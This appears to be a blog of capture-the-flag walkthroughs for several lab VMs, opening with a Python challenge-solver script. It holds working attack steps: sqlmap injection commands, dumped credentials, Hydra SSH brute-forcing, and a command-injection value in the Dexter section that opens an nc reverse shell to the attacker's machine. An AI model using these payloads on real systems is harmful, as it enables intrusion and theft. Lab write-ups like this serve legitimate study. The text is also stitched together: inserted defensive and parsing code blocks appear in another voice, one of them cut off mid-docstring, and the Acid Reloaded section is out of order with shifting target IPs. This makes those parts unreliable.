Exploit:

import requests

# Fetch the challenge page; the PHPSESSID cookie must be sent back with the answer
r = requests.get('hidden_URL')
res = r.text
cook = r.cookies
cookie = r.cookies['PHPSESSID']
print(cookie.strip())

# Save the page and read it back line by line
with open('file', 'w') as gn:
    gn.write(res)
with open('file', 'r') as gn:
    pn = gn.readlines()

# The parameters sit between <sub> tags on the first three lines of the page
pk = pn[0].split('sub>')
a = int(((pk[2])[5:8]).strip(' +'))    # value added at every step
print(a)
b = int(((pk[4])[11:14]).strip(']'))    # multiplier of the step index
print(b)
u_0 = int((pn[1])[16:20])               # first element of the sequence
print(u_0)
lolo = pn[2].split('sub>')
kle = int(((lolo[1])[0:6]).strip('<'))  # index of the element we are asked for
print(kle)

# Build the sequence: u_{i+1} = u_i + a -/+ b*i, with the sign taken from the page
tabl = [u_0]
if "-" in pk[4]:
    print("minus")
    for i in range(kle):
        nast = (a + tabl[i]) - (b*i)
        tabl.append(nast)
if "+" in pk[4]:
    print("byl plus")
    for i in range(kle):
        nast = (a + tabl[i]) + (b*i)
        tabl.append(nast)
ans = tabl[kle]
print(ans)

# Submit the result within the same session
answ = requests.get('hidden_URL?result='+str(ans), cookies=cook)
print(answ.text)
Sunday, 28 February 2016
Saturday, 13 February 2016
Lord of the root challenge
Hello,
Today I would like to present Lord of the root walkthrough :-)
Port scanning
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
[CUT]

Hmm, only port 22 is open, so let's try to connect via SSH... We get the following banner:

Easy as 1,2,3
root@192.168.1.103's password:

For me, this is a hint: port knocking 1,2,3. Let's examine the idea.

root@osboxes:~# nmap -p- 192.168.1.103
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-13 11:54 GMT
Nmap scan report for 192.168.1.103
Host is up (0.0014s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
MAC Address: 00:0C:29:75:18:08 (VMware)

That looks good. A little more information:

PORT STATE SERVICE VERSION
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))

Let's browse it.
Heh, so funny :-) I examined the source code and found that the picture is linked to the URL /images/iwilldoit.jpg. Perhaps we can display /robots.txt? Bingo!
Hmm, a little strange, because I only got some picture. Maybe the source code contains the information we are looking for.
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>

Hmmm, we should probably decode the string with a base64 decoder.

root@osboxes:~# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

We are on the right track :-)

root@osboxes:~# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA=" | base64 -d
/978345210/index.php

Great!
Thinking about SQLi? Unfortunately, manual payloads do not work. Maybe sqlmap will be more powerful in this case?
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp

The Webapp database may contain credentials.

[1 table]
+-------+
| Users |
+-------+

And dump:

Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

Good! I have logged in to the application using frodo's credentials.

Hmmm, in general nothing useful. So I added the usernames from the dump above to the users.txt file and the passwords to the pass.txt file. I ran a brute-force attack against the SSH port and got:

[22][ssh] host: 192.168.1.103 login: smeagol password: MyPreciousR00t

Let's try:
Excellent! We have a limited shell :-)

The following command shows us the right way:

smeagol@LordOfTheRoot:/var/www/978345210$ find / -perm -4000 -type f
[CUT]
/SECRET/door2/file
/SECRET/door1/file
/SECRET/door3/file
[CUT]

Hm, it looks interesting, doesn't it? I chose door2 at random.

smeagol@LordOfTheRoot:/SECRET/door2$ ls
file
smeagol@LordOfTheRoot:/SECRET/door2$ file file
file: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped

Each door contains the same file. We can see "setuid ELF 32-bit LSB", so we can probably try a Buffer Overflow.

smeagol@LordOfTheRoot:/SECRET/door2$ ./file $(python -c "print 'A'*500")
Segmentation fault (core dumped)

So, I am probably right :)

If you don't know how to perform a Buffer Overflow from the command line, please look at the Brain Pa(i)n challenge first.
Tuesday, 9 February 2016
Dexter challenge
Hi
root@osboxes:~# nmap -sn 192.168.1.0/24
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT
Nmap scan report for 192.168.1.105
Host is up (0.00072s latency).
MAC Address: 00:0C:29:48:F0:B7 (VMware)

Enumerating services:

root@osboxes:~# nmap -sV -A 192.168.1.105
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT
Nmap scan report for 192.168.1.105
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
| 1024 2b:60:6f:53:b8:c9:c8:f4:3b:0e:9b:9e:46:97:b7:55 (DSA)
| 2048 b5:9f:66:ab:f8:5d:a9:3e:51:8a:97:c3:85:10:e3:62 (RSA)
|_ 256 e7:bc:52:4f:29:0d:db:21:7e:72:76:2b:dd:ec:12:8e (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 46351/udp status
|_ 100024 1 48991/tcp status

Let's browse the application.
The Panel link redirects us to a web form.

SQL Injection does not work in this case :-/ Let's run DirBuster.

None of my ideas work; our sheet anchor is some exploit from the internet.

Dexter (CasinoLoader) Panel - SQL Injection

Hmmm, this exploit looks interesting, doesn't it? :-) I read the exploit and executed it:

root@osboxes:~/dexter# python 31686.py dump 192.168.1.105/Panel/gateway.php
User details: [{'password': 'if i had any real talent, i would make money legitimately', 'user': 'loserbotter'}]
Bot details: []

Let's try to log in to the Panel using the credentials :-) Excellent, it works!

The File Uploader may allow us to upload our reverse shell.

OK, let's execute our uploaded exploit.

Excellent! We have a limited shell!

So, we are looking for an exploit, because we are dealing with
www-data@dexter:/var/www$ uname -a
Linux dexter 3.2.0-4-686-pae #1 SMP Debian 3.2.54-2 i686 GNU/Linux

I have not found any effective exploit for our case. I looked for some interesting files, and in /var/www we have:

www-data@dexter:/var/www$ ls
Panel antitamper.list antitamper.py index.html tamper.log

antitamper.py and antitamper.list look interesting, don't they? Let's check the permissions on these files:

-rw-rw-rw- 1 root root 840 Mar 16 2014 antitamper.list
-rw-r--r-- 1 root root 278 Mar 16 2014 antitamper.py

Hmmm, antitamper.list is writable by everyone, and we can display the contents of both files:
www-data@dexter:/var/www$ cat antitamper.list
{
"/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
"/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
"/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
"/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
"/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
"/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
"/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
"/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
"/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
"/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
"/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
"/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}

Probably it is <file>:<md5(file)>.
www-data@dexter:/var/www$ cat antitamper.py
import os
import json
def check():
    with open('/var/www/antitamper.list') as f:
        content = json.loads(f.read())
    for f in content:
        # hash and path from the list are pasted unescaped into a shell command line
        s = "echo '%s %s' | md5sum -c --status >> /var/www/tamper.log" % (content[f], f)
        os.system(s)
check()

This script verifies file integrity. For us this information isn't nice, but we can see that os.system(s) is vulnerable: the hash and path read from the world-writable list end up directly in a shell command. My idea is: I will copy the content of antitamper.list, create a new file on my machine and fill it with the following content:
{
"root":"'; nc -nv -e /bin/sh 192.168.1.103 4444 #",
"/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
"/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
"/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
"/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
"/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
"/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
"/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
"/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
"/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
"/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
"/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
"/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}

I think the content is obvious to you. So we have to upload the file to our victim (in the same way as our reverse shell before).
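A fixed version of the antitamper.py pattern, added here as an example and not code from the page or from the Dexter VM: the hashes are computed with hashlib and compared in Python, so nothing from the list ever reaches a shell, and a list that other users can write (the rw-rw-rw- seen above) is refused before it is parsed. The sample directory, files and manifest are constructed inside the script; allowed_uids defaults to root, and the demo passes the current uid so it runs unprivileged.

```python
import hashlib
import hmac
import json
import os
import stat
import tempfile

HEX_DIGITS = set("0123456789abcdef")


def hash_file(path, algorithm="md5"):
    """Hash a file in chunks in-process instead of piping to md5sum (md5 only
    to stay compatible with the page's list; use sha256 for a new deployment)."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def manifest_is_trusted(path, allowed_uids=(0,)):
    """A reference list that other users can rewrite proves nothing:
    on Dexter antitamper.list was rw-rw-rw-, so www-data could replace it."""
    st = os.stat(path)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return st.st_uid in allowed_uids


def check(manifest_path, allowed_uids=(0,)):
    """Return {path: 'ok' | 'MODIFIED' | 'missing' | 'invalid-entry'}.
    No value from the list is handed to a shell, so quotes, ';' or '#'
    in a key or value are just data that fails validation."""
    if not manifest_is_trusted(manifest_path, allowed_uids):
        raise PermissionError("manifest is writable by others or has an unexpected owner")
    with open(manifest_path) as fh:
        expected = json.load(fh)
    if not isinstance(expected, dict):
        raise ValueError("manifest must be a JSON object of path -> md5")
    report = {}
    for path, digest in expected.items():
        # accept only an absolute path paired with a 32-hex-digit MD5
        if (not isinstance(digest, str) or len(digest) != 32
                or not set(digest.lower()) <= HEX_DIGITS or not os.path.isabs(path)):
            report[path] = "invalid-entry"
            continue
        try:
            actual = hash_file(path)
        except OSError:
            report[path] = "missing"
            continue
        # constant-time compare; a mismatch is reported, never executed
        report[path] = "ok" if hmac.compare_digest(actual, digest.lower()) else "MODIFIED"
    return report


def demo():
    """Constructed sample (not from the page): an intact file, a file edited after
    the list was written, a missing file, and an entry carrying shell
    metacharacters in the hash position like the injected 'root' key above."""
    workdir = tempfile.mkdtemp()
    intact = os.path.join(workdir, "index.php")
    tampered = os.path.join(workdir, "upload.php")
    gone = os.path.join(workdir, "gone.php")
    for name in (intact, tampered):
        with open(name, "w") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
    manifest = {
        intact: hash_file(intact),
        tampered: hash_file(tampered),
        gone: "d41d8cd98f00b204e9800998ecf8427e",  # md5 of an empty file; file absent
        "root": "'; id #",                         # hostile value where a hash belongs
    }
    manifest_path = os.path.join(workdir, "antitamper.list")
    with open(manifest_path, "w") as fh:
        json.dump(manifest, fh)
    os.chmod(manifest_path, 0o644)   # owner-writable only, unlike Dexter's rw-rw-rw-
    with open(tampered, "a") as fh:  # change made after the list was built
        fh.write("// unexpected change\n")
    # The demo runs unprivileged, so accept the current uid instead of root's.
    report = check(manifest_path, allowed_uids=(os.getuid(),))
    return report, intact, tampered, gone


def demo_world_writable():
    """A list anyone can write is rejected before a single byte of it is parsed."""
    workdir = tempfile.mkdtemp()
    manifest_path = os.path.join(workdir, "antitamper.list")
    with open(manifest_path, "w") as fh:
        fh.write("{}")
    os.chmod(manifest_path, 0o666)   # the permissions seen on Dexter
    try:
        check(manifest_path, allowed_uids=(os.getuid(),))
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print(demo()[0])
    print("world-writable list rejected:", demo_world_writable())
```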
and now

www-data@dexter:/var/www$ cat /var/www/Panel/exes/antitamper.list > antitamper.list

I checked, and the antitamper.list file has been updated. All we have to do is execute the antitamper.py script.
We are waiting and...
Game over!
Thursday, 4 February 2016
Bit-Bot challenge
Hi,
Bit-Bot challenge? Why not? Let's get started!
Nmap scan report for 192.168.1.104
Host is up (0.00068s latency).
MAC Address: 00:0C:29:F8:B4:4E (VMware)

OK, then:
root@osboxes:~# nmap -sV -A 192.168.1.104
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 13:32 GMT
Nmap scan report for 192.168.1.104
Host is up (0.00075s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
| 1024 e0:dc:be:e9:72:1b:c8:77:40:d2:38:2c:43:c9:b3:49 (DSA)
| 2048 88:e2:0c:77:06:bd:27:5a:14:06:58:c3:d5:41:21:f0 (RSA)
|_ 256 73:11:64:71:a6:c0:a3:f1:60:b5:cf:fa:78:42:5a:a0 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41291/udp status
|_ 100024 1 50153/tcp status

Nice! Let's check rpcbind:
program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /var/run/rpcbind.sock portmapper superuser
100000 3 local /var/run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.161.75 status 102
100024 1 tcp 0.0.0.0.195.233 status 102
100024 1 udp6 ::.180.8 status 102
100024 1 tcp6 ::.187.192 status 102

Nothing interesting :-) I hope there will be something useful on port 80.
But I clicked on the link and...

Grrrr.... So at least we know the Apache version. Dirbuster again...

Oh yeah! admin.php looks great!

SQL Injection does not work on this panel :-( Let's examine the source code. Unfortunately it does not contain any sensitive information. Maybe some exploit exists?

Bitbot C2 Panel gate2.php - Multiple Vulnerabilities

OK! From the exploit we now know that the hwid parameter in gate2.php is vulnerable to SQLi. So:
root@osboxes:~/bitbot# sqlmap -u "http://192.168.1.104/gate2.php?connection=0&hwid=1" -p hwid --level 5 --risk 3 --dbs
available databases [6]:
[*] bitbot
[*] information_schema
[*] mysql
[*] performance_schema
[*] roottext
[*] test

We are looking for some credentials...

Database: bitbot
Table: mining_configs
[2 entries]
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| botid | mode | pass            | port | pool    | proxy   | params   | user            | threads |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| all   | agr  | worker password | port | poolurl | <blank> | -g yes   | worker username | default |
| all   | idle | worker password | port | poolurl | <blank> | -g no    | worker username | default |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+

Let's try to log in to BitBot with the credentials. Unfortunately it doesn't work.
We retrieved the source code of config.php via SQL Injection:

<?php
//Timezone
date_default_timezone_set('Europe/London'); // VISIT http://www.php.net/manual/en/timezones.php For list of timezones
//Admin Configs
$ADMIN_USER_NAME = 'botter'; //panel username
$ADMIN_PASSWORD = 'IF I CAME UP WITH UNIQUE PASSWORDS, I WOULD BE HOME BY NOW'; //panel password
//SQL Configs
$SQL_HOST = 'localhost'; //db host
$SQL_USER_NAME = 'root'; //db user
$SQL_PASSWORD = 'THIS PASSWORD WILL NOT HELP YOU'; //db pass
$SQL_DATABASE = 'bitbot'; //db name
$SQL_CONNECTION = @mysql_connect($SQL_HOST,$SQL_USER_NAME,$SQL_PASSWORD);
//Panel Configs
$BOT_PAGE_MAX = '50';
//Mining Configs
$JSONurl = ''; //follow readme
$apitoken = ''; //follow readme
$apihash = 'hashrate'; //follow readme
$crypto = 'btc'; //btc or ltc
////////////////Do Not Edit Beyond This Point///////////////////////////////////////////
$BOT_CHECKIN_INTERVAL = '60'; //seconds
$CMD_SPLIT = '<\\\\\>';
$CMD_DOWNLOAD = 'DOWN';
$CMD_UPDATE = 'UPDATE';
$CMD_VISIT_SITE = 'VISIT';
$CMD_REMOVE = 'REMOVE';
$CMD_DDOS_STOP = 'STOP';
$CMD_BTC = 'MINE';
$CMD_STOPBTC = 'STOPMINE';
?>

Wonderful! We have a lot of credentials (only two :P)! I am inside!
Interesting! But I didn't find much chance to upload a reverse shell. Let's try to authenticate via SSH with the credentials.

Great! We have a limited shell! Let's check what bot.py from the /index.php page is.
botter@Bitbot:~$ cd /var/www/bot/
botter@Bitbot:/var/www/bot$ ls -la
total 12
drwxr--r-- 2 botter root 4096 Aug 21 2013 .
drwxr-xr-x 6 root root 4096 Aug 11 2013 ..
-rw-r--r-- 1 botter root 2418 Aug 11 2013 bot.py

We are allowed to read and write this file. Hmm, I am too weak to do something useful with it.
Let's look at what we have in our /home directory:

botter@Bitbot:~$ cat gen.sh
ifconfig eth0 | grep inet | grep -v inet6 | awk '{print $2substr(rand(),0,5);}' | awk '{print $0"\n"$0}' | passwd

Hm, we can read and understand bash code: the password is the eth0 address followed by a few characters of awk's rand(). Let's try:
root@osboxes:~/bitbot# python -c 'for i in range(100): print "addr:192.168.1.1040."+str(i)' > passwd.txt
root@osboxes:~/bitbot# hydra -l root -P passwd.txt ssh://192.168.1.104 -f -e nsr
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-04 15:13:27
[DATA] 16 tasks, 1 server, 103 login tries (l:1/p:103), ~6 tries per task
[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22][ssh] host: 192.168.1.104 login: root password: addr:192.168.1.1040.54
[STATUS] attack finished for 192.168.1.104 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Great! We are heroes!
Game over!
Wednesday, 3 February 2016
Acid reloaded challenge
Hi.
We can see that our credentials are validated in /bin/includes/validation.php. We have also discovered the dashboard.php file, which is the page shown after validation. We have to force a successful validation. Let's reload our dashboard.php and try to deceive the application into believing we have been successfully authenticated.
And the result:
Today is time for Acid Reloaded challenge.
root@osboxes:~# nmap -sn 192.168.1.0/24
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:30 GMT
(..)
Nmap scan report for 192.168.1.102
Host is up (0.00071s latency).
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
(...)
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.67 seconds

Enumerating services...
root@osboxes:~# nmap -sV -A 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:32 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00085s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=2/3%Time=56B1F361%P=i686-pc-linux-gnu%r(NULL,29
SF:,"SSH-2\.0-OpenSSH_6\.7p1\x20Ubuntu-5ubuntu1\.3\r\n");
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop

Hmmm... Only port 22 open? This is a little strange...
root@osboxes:~# nmap -p- 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:35 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00054s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
33447/tcp filtered unknown
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.54 seconds

OK, let's try to connect to port 22.
Oh! We can see that our target implements "Port Knocking", so let's knock on the ports!
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 3 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:20 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00091s latency).
PORT STATE SERVICE
3/tcp closed compressnet
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 2 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00096s latency).
PORT STATE SERVICE
2/tcp closed compressnet
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 1 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00099s latency).
PORT STATE SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 33447 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.0025s latency).
PORT STATE SERVICE
33447/tcp open unknown
MAC Address: 00:0C:29:BB:6E:B3 (VMware)

Amazing! Port 33447 is open! It would be a good idea to check what kind of service is running on port 33447.

PORT STATE SERVICE VERSION
33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))

We are able to browse the application in our browser.
The default page encourages us to be creative :-) Let's execute dirbuster.
The bin directory looks interesting. The response to the http://192.168.1.102/bin request is shown below.
As far as I know, this web form is resistant to SQL Injection attacks, so let's go deeper.
In our application, /bin/dashboard.php looks promising.
Hmmm, let's go back to /bin/index.php and intercept the traffic.
Let's click on the "Click" link. We have been redirected to http://192.168.1.105:33447/bin/l33t_haxor.php
We noticed that the source code indicates l33t_haxor.php uses a numeric id parameter.
My sqlmap attempts failed, but I want to try harder, because maybe the application implements a WAF, so:
sqlmap -u "http://192.168.1.105:33447/bin/l33t_haxor.php?id=1*%22" --dbms=mysql --threads=10 -p id --batch --tamper=space2comment,space2dash,space2hash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank
(...)
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

Excellent! Let's find some credentials (if they exist).
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login

Tables:
Database: secure_login
[4 tables]
+-----------------+
| UB3R/strcpy.exe |
| login_attempts  |
| members         |
| word            |
+-----------------+

I didn't find any interesting information in the secure_login database :( But UB3R/strcpy.exe looks a little strange. Let's examine it.
http://192.168.1.105:33447/UB3R/strcpy.exe

I downloaded the strcpy.exe file to my machine.

root@osboxes:~/Downloads# file strcpy.exe
strcpy.exe: PDF document, version 1.5

We are happy because of this. This file contains only this image? I don't believe that; we should examine the file deeper.
root@osboxes:~/Downloads# strings strcpy.pdf
(...)
acid.txt
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,
Acid
lol.jpg
(...)

OK, at least we know that we are on the right track :-)
root@osboxes:~/Downloads# mv strcpy.pdf strcpy.rar

And:

root@osboxes:~/Downloads# unrar e strcpy.rar
UNRAR 4.10 freeware Copyright (c) 1993-2012 Alexander Roshal
Extracting from strcpy.rar
Extracting acid.txt OK
Extracting lol.jpg OK
All OK
root@osboxes:~/Downloads# cat acid.txt
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,

Maybe lol.jpg will be helpful.
Hmmm, maybe something useful is hardcoded in the picture. So, let's try a technique similar to the one we used with our PDF file.

root@osboxes:~/Downloads# strings lol.jpg
(...)
hint.txt
`You have found a contact. Now, go and grab the details :-)
root@osboxes:~/Downloads# mv lol.jpg lol.rar
root@osboxes:~/Downloads# unrar e lol.rar
UNRAR 4.10 freeware Copyright (c) 1993-2012 Alexander Roshal
Extracting from lol.rar
Extracting Avinash.contact OK
Extracting hint.txt OK
All OK
root@osboxes:~/Downloads# cat hint.txt
You have found a contact. Now, go and grab the details :-)
root@osboxes:~/Downloads# cat Avinash.contact
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P" xmlns:MSWABMAPI="http://schemas.microsoft.com/Contact/Extended/MSWABMAPI">
<c:CreationDate>2015-08-23T11:39:18Z</c:CreationDate><c:Extended><MSWABMAPI:PropTag0x3A58101F c:ContentType="binary/x-ms-wab-mapi" c:type="binary">AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=</MSWABMAPI:PropTag0x3A58101F></c:Extended>
<c:ContactIDCollection><c:ContactID c:ElementID="599ef753-f77f-4224-8700-e551bdc2bb1e"><c:Value>0bcf610e-a7be-4f26-9042-d6b3c22c9863</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="0745ffd4-ef0a-4c4f-b1b6-0ea38c65254e"><c:Type>SMTP</c:Type><c:Address>acid.exploit@gmail.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="594eec25-47bd-4290-bd96-a17448f7596a" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="318f9ce5-7a08-4ea0-8b6a-2ce3e9829ff2"><c:FormattedName>Avinash</c:FormattedName><c:GivenName>Avinash</c:GivenName></c:Name></c:NameCollection><c:PersonCollection><c:Person c:ElementID="865f9eda-796e-451a-92b1-bf8ee2172134"><c:FormattedName>Makke</c:FormattedName><c:LabelCollection><c:Label>wab:Spouse</c:Label></c:LabelCollection></c:Person></c:PersonCollection><c:PhotoCollection><c:Photo c:ElementID="2fb5b981-cec1-45d0-ae61-7c340cfb3d72"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
The string AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA= looks like something encoded via base64. Let's try to decode it:

root@osboxes:~/Downloads# echo "AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=" | base64 -d

This command gives us something like NooB@123. This string may be a password, and Avinash and Makke may be usernames.
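The blob decodes to more than NooB@123, which is why base64 -d only shows "something like" it: the property tag ends in 0x101F, MAPI's multi-valued Unicode string type, so the bytes are a string count, then for each string a 32-bit byte length and UTF-16LE text with a NUL terminator, and the terminal swallows the NUL bytes between the characters. An added parser and encoder for that layout (my reading of the page's bytes, not code from the page); the only input is the blob taken from the contact file above.

```python
import base64
import struct

# The value from the page's Avinash.contact, property MSWABMAPI:PropTag0x3A58101F.
PAGE_BLOB_B64 = "AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA="


def decode_mv_unicode_prop(b64_text):
    """Parse a MAPI multi-valued Unicode property (type word 0x101F) as the
    Windows Address Book stores it: a little-endian 32-bit string count, then
    per string a 32-bit byte length and UTF-16LE text ending in a NUL code unit.
    This layout is my reading of the bytes on the page (assumption)."""
    raw = base64.b64decode(b64_text, validate=True)
    if len(raw) < 4:
        raise ValueError("blob too short for the count field")
    (count,) = struct.unpack_from("<I", raw, 0)
    offset, values = 4, []
    for _ in range(count):
        if offset + 4 > len(raw):
            raise ValueError("truncated length field at offset %d" % offset)
        (length,) = struct.unpack_from("<I", raw, offset)
        offset += 4
        chunk = raw[offset:offset + length]
        if len(chunk) != length or length % 2:
            raise ValueError("bad string length %d at offset %d" % (length, offset))
        values.append(chunk.decode("utf-16-le").rstrip("\x00"))
        offset += length
    if offset != len(raw):
        raise ValueError("%d trailing bytes after the last string" % (len(raw) - offset))
    return values


def encode_mv_unicode_prop(values):
    """Inverse of the parser; a round trip back to the page's exact base64
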